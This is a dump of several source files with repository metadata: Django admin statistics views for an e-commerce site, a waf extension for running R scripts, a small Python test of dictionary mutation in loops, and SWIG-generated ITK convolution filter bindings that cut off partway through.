257ab21f25ff3348d9736148b96f22450be75acd | 7c2c1f8eb08e998cb810481f1dbbbc994f175611 | /meiduo_mall/meiduo_mall/apps/meiduo_admin/views/statistical.py | 694a93c08c7baa16538ca6945c21598d92728570 | [] | no_license | 1584881047/meiduo | 14e65652032aa83fec5347ade7e242b98ab1531b | 4176c3cc615184e50e11e9381fff99972060f1d0 | refs/heads/master | 2022-12-16T10:52:28.760013 | 2019-09-16T00:14:55 | 2019-09-16T00:14:55 | 207,760,356 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,340 | py | from django.utils import timezone
from rest_framework.permissions import IsAdminUser
from rest_framework.response import Response
from rest_framework.views import APIView
from goods.models import GoodsVisitCount
from meiduo_admin.serializers.statistical import GoodsVisitSerializer
from users.models import User
class UserTotalCountView(APIView):
# 添加权限校验
permission_classes = [IsAdminUser]
def get(self, request):
"""
获取用户数量
:param request:
:return:
"""
count = User.objects.count()
return Response({
'date': timezone.now(),
'count': count
})
class UserDayIncrementView(APIView):
# 添加权限校验
permission_classes = [IsAdminUser]
def get(self, request):
"""
获取今日用户访问数量
:param request:
:return:
"""
now_time = timezone.now().replace(hour=0, minute=0, second=0, microsecond=0)
# 用户创建时间大于等于 今天的0点
count = User.objects.filter(date_joined__gte=now_time).count()
return Response({
'date': timezone.now(),
'count': count
})
class UserDayActiveView(APIView):
# 添加权限校验
permission_classes = [IsAdminUser]
def get(self, request):
"""
今日活跃用户
:param request:
:return:
"""
now_time = timezone.now().replace(hour=0, minute=0, second=0, microsecond=0)
count = User.objects.filter(last_login__gte=now_time).count()
return Response({
'date': timezone.now(),
'count': count
})
class UserDayOrdersView(APIView):
# 添加权限校验
permission_classes = [IsAdminUser]
def get(self, request):
"""获取今日下单用户数量"""
now_date = timezone.now().replace(hour=0, minute=0, second=0, microsecond=0)
# 订单创建的时间 >= 今天 的用户 去重 的数量
count = User.objects.filter(orders__create_time__gte=now_date).distinct().count()
return Response({
'date': timezone.now(),
'count': count
})
class UserMonthCountView(APIView):
# 添加权限校验
permission_classes = [IsAdminUser]
# 获取30天日增长用户
def get(self, request):
now_date = timezone.now().replace(hour=0, minute=0, second=0, microsecond=0)
# 开始时间
begin_data = now_date - timezone.timedelta(days=29)
data_list = []
while begin_data <= now_date:
count = User.objects.filter(date_joined__gte=begin_data,
date_joined__lt=begin_data + timezone.timedelta(days=1)).count()
data_list.append({
'count': count,
'date': begin_data.date()
})
begin_data += timezone.timedelta(days=1)
return Response(data_list)
class GoodsDayView(APIView):
permission_classes = [IsAdminUser]
# 日分类商品访问量
def get(self, request):
now_time = timezone.now().date()
goods_visit = GoodsVisitCount.objects.filter(date=now_time)
serializer = GoodsVisitSerializer(goods_visit, many=True)
return Response(serializer.data)
| [
"lixiaoweiai@126.com"
] | lixiaoweiai@126.com |
4fcb27cb9a283d949398d1f36fbe1e675f64b82c | eb0914b92cd4ecc32d311e94dd48126fa0be13e7 | /.mywaflib/waflib/extras/run_r_script.py | bb3c3f68ad352d1a64a75827493bb7b4823d2ceb | [
"BSD-3-Clause"
] | permissive | livioferrante/my-final-project | 1d937c2b020120da42dee4f7150ef37979e752bd | f3d082173c7c38e69905e49c9a544d3cc75ad172 | refs/heads/master | 2020-05-17T11:55:14.948417 | 2014-12-15T20:15:18 | 2014-12-15T20:15:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,830 | py | #!/usr/bin/env python
# encoding: utf-8
# Hans-Martin von Gaudecker, 2012-13
"""
Run a R script in the directory specified by **ctx.bldnode**.
Strings supplied to the **prepend** and **append** keywords will be
added to the command line.
Usage::
ctx(
features='run_r_script',
source='some_script.r',
target=['some_table.tex', 'some_figure.eps'],
deps='some_data.csv',
append='',
prepend=''
)
"""
from waflib import Task, TaskGen, Logs
R_COMMANDS = ['RScript', 'Rscript']
def configure(ctx):
ctx.find_program(
R_COMMANDS,
var='RCMD',
errmsg="""\n
No R executable found!\n\n
If R is needed:\n
1) Check the settings of your system path.
2) Note we are looking for R executables called: %s
If yours has a different name, please report to hmgaudecker [at] gmail\n
Else:\n
Do not load the 'run_r_script' tool in the main wscript.\n\n"""
% R_COMMANDS
)
ctx.env.RFLAGS = ''
@Task.update_outputs
class run_r_script(Task.Task):
"""Run a R script."""
run_str = '${PREPEND} "${RCMD}" ${RFLAGS} "${SRC[0].abspath()}" ${APPEND}'
shell = True
def exec_command(self, cmd, **kw):
bld = self.generator.bld
try:
if not kw.get('cwd', None):
kw['cwd'] = bld.cwd
except AttributeError:
bld.cwd = kw['cwd'] = bld.variant_dir
if not self.buffer_output:
kw["stdout"] = kw["stderr"] = None
return bld.exec_command(cmd, **kw)
def keyword(self):
"""
Override the 'Compiling' default.
"""
return 'Running'
def __str__(self):
"""
More useful output.
"""
return "{prepend} [R] {rflags} {fn} {append}".format(
prepend=self.env.PREPEND,
rflags=self.env.RFLAGS,
fn=self.inputs[0].path_from(self.inputs[0].ctx.launch_node()),
append=self.env.APPEND
)
@TaskGen.feature('run_r_script')
@TaskGen.before_method('process_source')
def apply_run_r_script(tg):
"""Task generator customising the options etc. to call R in batch
mode for running a R script.
"""
# Convert sources and targets to nodes
src_node = tg.path.find_resource(tg.source)
tgt_nodes = [tg.path.find_or_declare(t) for t in tg.to_list(tg.target)]
tsk = tg.create_task('run_r_script', src=src_node, tgt=tgt_nodes)
tsk.env.APPEND = getattr(tg, 'append', '')
tsk.env.PREPEND = getattr(tg, 'prepend', '')
tsk.buffer_output = getattr(tg, 'buffer_output', True)
# dependencies (if the attribute 'deps' changes, trigger a recompilation)
for x in tg.to_list(getattr(tg, 'deps', [])):
node = tg.path.find_resource(x)
if not node:
tg.bld.fatal(
'Could not find dependency %r for running %r'
% (x, src_node.relpath())
)
else:
tsk.dep_nodes.append(node)
Logs.debug(
'deps: found dependencies %r for running %r' % (
tsk.dep_nodes, src_node.relpath())
)
# Bypass the execution of process_source by setting the source to an empty
# list
tg.source = []
| [
"livio.ferrante@tiscali.it"
] | livio.ferrante@tiscali.it |
4b889b9c80962f87dfe883a127fa04e50504a1fa | 46b432cd3557038c454601367b878f889c9b6a8f | /hShibata/tutorial03/test.py | e365b536df8fa200f4ac722f0e7e91dd5ca53031 | [] | no_license | tmu-nlp/NLPtutorial2019 | 84ceec06568fd9d899a686658fb8851466133375 | d77d199c50cd37d70e462209a7bfcd4dee9140a1 | refs/heads/master | 2020-05-14T13:34:05.336594 | 2019-09-25T02:25:41 | 2019-09-25T02:25:41 | 181,814,723 | 1 | 0 | null | 2019-08-01T18:53:54 | 2019-04-17T04:04:06 | Python | UTF-8 | Python | false | false | 1,287 | py |
print("hello")
# the test to change value of dictionary in for loop by smart way. We need this test to implement a method which builds n-gram using a recursive function.
myDict = {}
myDict[0] = 3
myDict[1] = 3
for key, val in myDict.items():
val = 0
print(myDict) # output is {0: 3, 1: 3}. So we cannot.
for key, val in myDict.items():
myDict[key] = 99
print(myDict) # output is {0: {2: 2}, 1: {2: 2}}. So we can by this way, which re reference using key, as we know well.
class tClass:
def __init__(self):
self.a = 0
# next we will shows to change the member value of a class using for loop.
for key, val in myDict.items():
myDict[key] = tClass() # first, initialize all value as a class.
for key, val in myDict.items():
val.a = 99 # then we can change its member, while we could not for an ordinal value type such as number.
for key, val in myDict.items():
print(key, val.a)
# output is 0 99\n 1 99. So this is possible. We can know that python3 is implemented to pass a reference of a dictionary value on the for loop, if it is a class.
# the below example test whether the next syntax is recognized correctly.
def call(ins: tClass):
print(ins.a)
for key, val in myDict.items():
call(val)
# the output is 99\n 99. So this works. | [
"smithakihide1992@gmail.com"
] | smithakihide1992@gmail.com |
31a3ad2735b2a2f377105bc4cc2c2522e2f60037 | cc0c0f99a5cf563ff52a76f2ac17cdad09d22f01 | /venv/Lib/site-packages/itk/itkConvolutionImageFilterBasePython.py | d6fead69072bd45c72db67ef950ec1ad03029b09 | [] | no_license | Marxss/carck_detect_system | 9c0d338bde322b4c7304fd0addb524d8697c8a7b | d2480f2108052af8af0aa5265a5239c309885043 | refs/heads/master | 2022-04-15T23:34:20.988335 | 2020-03-29T16:24:00 | 2020-03-29T16:24:00 | 214,625,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73,002 | py | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.8
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (3, 0, 0):
new_instancemethod = lambda func, inst, cls: _itkConvolutionImageFilterBasePython.SWIG_PyInstanceMethod_New(func)
else:
from new import instancemethod as new_instancemethod
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_itkConvolutionImageFilterBasePython', [dirname(__file__)])
except ImportError:
import _itkConvolutionImageFilterBasePython
return _itkConvolutionImageFilterBasePython
if fp is not None:
try:
_mod = imp.load_module('_itkConvolutionImageFilterBasePython', fp, pathname, description)
finally:
fp.close()
return _mod
_itkConvolutionImageFilterBasePython = swig_import_helper()
del swig_import_helper
else:
import _itkConvolutionImageFilterBasePython
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
object.__setattr__(self, name, value)
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
def _swig_setattr_nondynamic_method(set):
def set_attr(self, name, value):
if (name == "thisown"):
return self.this.own(value)
if hasattr(self, name) or (name == "this"):
set(self, name, value)
else:
raise AttributeError("You cannot add attributes to %s" % self)
return set_attr
import ITKCommonBasePython
import pyBasePython
import itkImageBoundaryConditionPython
import itkOffsetPython
import itkSizePython
import itkImagePython
import itkPointPython
import vnl_vector_refPython
import stdcomplexPython
import vnl_vectorPython
import vnl_matrixPython
import itkVectorPython
import itkFixedArrayPython
import itkMatrixPython
import vnl_matrix_fixedPython
import itkCovariantVectorPython
import itkSymmetricSecondRankTensorPython
import itkImageRegionPython
import itkIndexPython
import itkRGBPixelPython
import itkRGBAPixelPython
import itkImageToImageFilterAPython
import itkImageSourcePython
import itkImageSourceCommonPython
import itkVectorImagePython
import itkVariableLengthVectorPython
import itkImageToImageFilterCommonPython
def itkConvolutionImageFilterBaseIF3IF3_New():
return itkConvolutionImageFilterBaseIF3IF3.New()
def itkConvolutionImageFilterBaseIF2IF2_New():
return itkConvolutionImageFilterBaseIF2IF2.New()
def itkConvolutionImageFilterBaseIUS3IUS3_New():
return itkConvolutionImageFilterBaseIUS3IUS3.New()
def itkConvolutionImageFilterBaseIUS2IUS2_New():
return itkConvolutionImageFilterBaseIUS2IUS2.New()
def itkConvolutionImageFilterBaseIUC3IUC3_New():
return itkConvolutionImageFilterBaseIUC3IUC3.New()
def itkConvolutionImageFilterBaseIUC2IUC2_New():
return itkConvolutionImageFilterBaseIUC2IUC2.New()
def itkConvolutionImageFilterBaseISS3ISS3_New():
return itkConvolutionImageFilterBaseISS3ISS3.New()
def itkConvolutionImageFilterBaseISS2ISS2_New():
return itkConvolutionImageFilterBaseISS2ISS2.New()
class itkConvolutionImageFilterBaseIF2IF2(itkImageToImageFilterAPython.itkImageToImageFilterIF2IF2):
"""Proxy of C++ itkConvolutionImageFilterBaseIF2IF2 class."""
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionIF2') -> "void":
"""SetBoundaryCondition(itkConvolutionImageFilterBaseIF2IF2 self, itkImageBoundaryConditionIF2 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetBoundaryCondition(self, _arg)
def GetBoundaryCondition(self) -> "itkImageBoundaryConditionIF2 *":
"""GetBoundaryCondition(itkConvolutionImageFilterBaseIF2IF2 self) -> itkImageBoundaryConditionIF2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetBoundaryCondition(self)
def SetKernelImage(self, _arg: 'itkImageF2') -> "void":
"""SetKernelImage(itkConvolutionImageFilterBaseIF2IF2 self, itkImageF2 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetKernelImage(self, _arg)
def GetKernelImage(self) -> "itkImageF2 const *":
"""GetKernelImage(itkConvolutionImageFilterBaseIF2IF2 self) -> itkImageF2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetKernelImage(self)
def SetNormalize(self, _arg: 'bool const') -> "void":
"""SetNormalize(itkConvolutionImageFilterBaseIF2IF2 self, bool const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetNormalize(self, _arg)
def GetNormalize(self) -> "bool":
"""GetNormalize(itkConvolutionImageFilterBaseIF2IF2 self) -> bool"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetNormalize(self)
def NormalizeOn(self) -> "void":
"""NormalizeOn(itkConvolutionImageFilterBaseIF2IF2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_NormalizeOn(self)
def NormalizeOff(self) -> "void":
"""NormalizeOff(itkConvolutionImageFilterBaseIF2IF2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_NormalizeOff(self)
SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SAME
VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_VALID
def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseIF2IF2::OutputRegionModeType const') -> "void":
"""SetOutputRegionMode(itkConvolutionImageFilterBaseIF2IF2 self, itkConvolutionImageFilterBaseIF2IF2::OutputRegionModeType const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetOutputRegionMode(self, _arg)
def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseIF2IF2::OutputRegionModeType":
"""GetOutputRegionMode(itkConvolutionImageFilterBaseIF2IF2 self) -> itkConvolutionImageFilterBaseIF2IF2::OutputRegionModeType"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetOutputRegionMode(self)
def SetOutputRegionModeToSame(self) -> "void":
"""SetOutputRegionModeToSame(itkConvolutionImageFilterBaseIF2IF2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetOutputRegionModeToSame(self)
def SetOutputRegionModeToValid(self) -> "void":
"""SetOutputRegionModeToValid(itkConvolutionImageFilterBaseIF2IF2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetOutputRegionModeToValid(self)
__swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseIF2IF2
def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIF2IF2 *":
"""cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIF2IF2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_cast(obj)
cast = staticmethod(cast)
def New(*args, **kargs):
"""New() -> itkConvolutionImageFilterBaseIF2IF2
Create a new object of the class itkConvolutionImageFilterBaseIF2IF2 and set the input and the parameters if some
named or non-named arguments are passed to that method.
New() tries to assign all the non named parameters to the input of the new objects - the
first non named parameter in the first input, etc.
The named parameters are used by calling the method with the same name prefixed by 'Set'.
Ex:
itkConvolutionImageFilterBaseIF2IF2.New( reader, Threshold=10 )
is (most of the time) equivalent to:
obj = itkConvolutionImageFilterBaseIF2IF2.New()
obj.SetInput( 0, reader.GetOutput() )
obj.SetThreshold( 10 )
"""
obj = itkConvolutionImageFilterBaseIF2IF2.__New_orig__()
import itkTemplate
itkTemplate.New(obj, *args, **kargs)
return obj
New = staticmethod(New)
itkConvolutionImageFilterBaseIF2IF2.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetBoundaryCondition, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetBoundaryCondition, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetKernelImage, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetKernelImage, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetNormalize, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetNormalize, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_NormalizeOn, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_NormalizeOff, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetOutputRegionMode, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetOutputRegionMode, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_swigregister
itkConvolutionImageFilterBaseIF2IF2_swigregister(itkConvolutionImageFilterBaseIF2IF2)
def itkConvolutionImageFilterBaseIF2IF2_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIF2IF2 *":
"""itkConvolutionImageFilterBaseIF2IF2_cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIF2IF2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_cast(obj)
class itkConvolutionImageFilterBaseIF3IF3(itkImageToImageFilterAPython.itkImageToImageFilterIF3IF3):
"""Proxy of C++ itkConvolutionImageFilterBaseIF3IF3 class."""
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionIF3') -> "void":
"""SetBoundaryCondition(itkConvolutionImageFilterBaseIF3IF3 self, itkImageBoundaryConditionIF3 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetBoundaryCondition(self, _arg)
def GetBoundaryCondition(self) -> "itkImageBoundaryConditionIF3 *":
"""GetBoundaryCondition(itkConvolutionImageFilterBaseIF3IF3 self) -> itkImageBoundaryConditionIF3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetBoundaryCondition(self)
def SetKernelImage(self, _arg: 'itkImageF3') -> "void":
"""SetKernelImage(itkConvolutionImageFilterBaseIF3IF3 self, itkImageF3 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetKernelImage(self, _arg)
def GetKernelImage(self) -> "itkImageF3 const *":
"""GetKernelImage(itkConvolutionImageFilterBaseIF3IF3 self) -> itkImageF3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetKernelImage(self)
def SetNormalize(self, _arg: 'bool const') -> "void":
"""SetNormalize(itkConvolutionImageFilterBaseIF3IF3 self, bool const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetNormalize(self, _arg)
def GetNormalize(self) -> "bool":
"""GetNormalize(itkConvolutionImageFilterBaseIF3IF3 self) -> bool"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetNormalize(self)
def NormalizeOn(self) -> "void":
"""NormalizeOn(itkConvolutionImageFilterBaseIF3IF3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_NormalizeOn(self)
def NormalizeOff(self) -> "void":
"""NormalizeOff(itkConvolutionImageFilterBaseIF3IF3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_NormalizeOff(self)
SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SAME
VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_VALID
def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseIF3IF3::OutputRegionModeType const') -> "void":
"""SetOutputRegionMode(itkConvolutionImageFilterBaseIF3IF3 self, itkConvolutionImageFilterBaseIF3IF3::OutputRegionModeType const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetOutputRegionMode(self, _arg)
def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseIF3IF3::OutputRegionModeType":
"""GetOutputRegionMode(itkConvolutionImageFilterBaseIF3IF3 self) -> itkConvolutionImageFilterBaseIF3IF3::OutputRegionModeType"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetOutputRegionMode(self)
def SetOutputRegionModeToSame(self) -> "void":
"""SetOutputRegionModeToSame(itkConvolutionImageFilterBaseIF3IF3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetOutputRegionModeToSame(self)
def SetOutputRegionModeToValid(self) -> "void":
"""SetOutputRegionModeToValid(itkConvolutionImageFilterBaseIF3IF3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetOutputRegionModeToValid(self)
__swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseIF3IF3
def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIF3IF3 *":
"""cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIF3IF3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_cast(obj)
cast = staticmethod(cast)
def New(*args, **kargs):
"""New() -> itkConvolutionImageFilterBaseIF3IF3
Create a new object of the class itkConvolutionImageFilterBaseIF3IF3 and set the input and the parameters if some
named or non-named arguments are passed to that method.
New() tries to assign all the non named parameters to the input of the new objects - the
first non named parameter in the first input, etc.
The named parameters are used by calling the method with the same name prefixed by 'Set'.
Ex:
itkConvolutionImageFilterBaseIF3IF3.New( reader, Threshold=10 )
is (most of the time) equivalent to:
obj = itkConvolutionImageFilterBaseIF3IF3.New()
obj.SetInput( 0, reader.GetOutput() )
obj.SetThreshold( 10 )
"""
obj = itkConvolutionImageFilterBaseIF3IF3.__New_orig__()
import itkTemplate
itkTemplate.New(obj, *args, **kargs)
return obj
New = staticmethod(New)
itkConvolutionImageFilterBaseIF3IF3.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetBoundaryCondition, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetBoundaryCondition, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetKernelImage, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetKernelImage, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetNormalize, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetNormalize, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_NormalizeOn, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_NormalizeOff, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetOutputRegionMode, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetOutputRegionMode, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_swigregister
itkConvolutionImageFilterBaseIF3IF3_swigregister(itkConvolutionImageFilterBaseIF3IF3)
def itkConvolutionImageFilterBaseIF3IF3_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIF3IF3 *":
"""itkConvolutionImageFilterBaseIF3IF3_cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIF3IF3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_cast(obj)
class itkConvolutionImageFilterBaseISS2ISS2(itkImageToImageFilterAPython.itkImageToImageFilterISS2ISS2):
"""Proxy of C++ itkConvolutionImageFilterBaseISS2ISS2 class."""
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionISS2') -> "void":
"""SetBoundaryCondition(itkConvolutionImageFilterBaseISS2ISS2 self, itkImageBoundaryConditionISS2 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetBoundaryCondition(self, _arg)
def GetBoundaryCondition(self) -> "itkImageBoundaryConditionISS2 *":
"""GetBoundaryCondition(itkConvolutionImageFilterBaseISS2ISS2 self) -> itkImageBoundaryConditionISS2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetBoundaryCondition(self)
def SetKernelImage(self, _arg: 'itkImageSS2') -> "void":
"""SetKernelImage(itkConvolutionImageFilterBaseISS2ISS2 self, itkImageSS2 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetKernelImage(self, _arg)
def GetKernelImage(self) -> "itkImageSS2 const *":
